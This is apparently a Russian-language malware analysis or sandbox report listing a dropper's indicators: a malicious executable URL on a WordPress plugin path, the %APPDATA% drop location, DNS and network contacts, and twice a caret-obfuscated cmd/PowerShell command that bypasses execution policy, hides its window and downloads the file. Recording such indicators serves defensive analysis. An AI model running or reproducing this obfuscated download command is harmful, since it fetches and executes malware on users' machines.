Техническая информация
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowEr^S^he^ll.^Ex^e^ -e^XeCut^io^NPoLiC^y bY^pAsS^ ^-No^p^rOFI^Le^ -wiNdOwStyle ^h^IDd^eN ^(n^EW^-o^bj^ec^T systeM^.^NeT^.WebclI^ENt)^.^D^oWNl^oa^d^FIl^E('http://nsholiday.co...
- %APPDATA%.exe
- 'ns###iday.com':80
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
- DNS ASK ns###iday.com
- '<SYSTEM32>\cmd.exe' /c "PowEr^S^he^ll.^Ex^e^ -e^XeCut^io^NPoLiC^y bY^pAsS^ ^-No^p^rOFI^Le^ -wiNdOwStyle ^h^IDd^eN ^(n^EW^-o^bj^ec^T systeM^.^NeT^.WebclI^ENt)^.^D^oWNl^oa^d^FIl^E('http://nsholiday.co...' (со скрытым окном)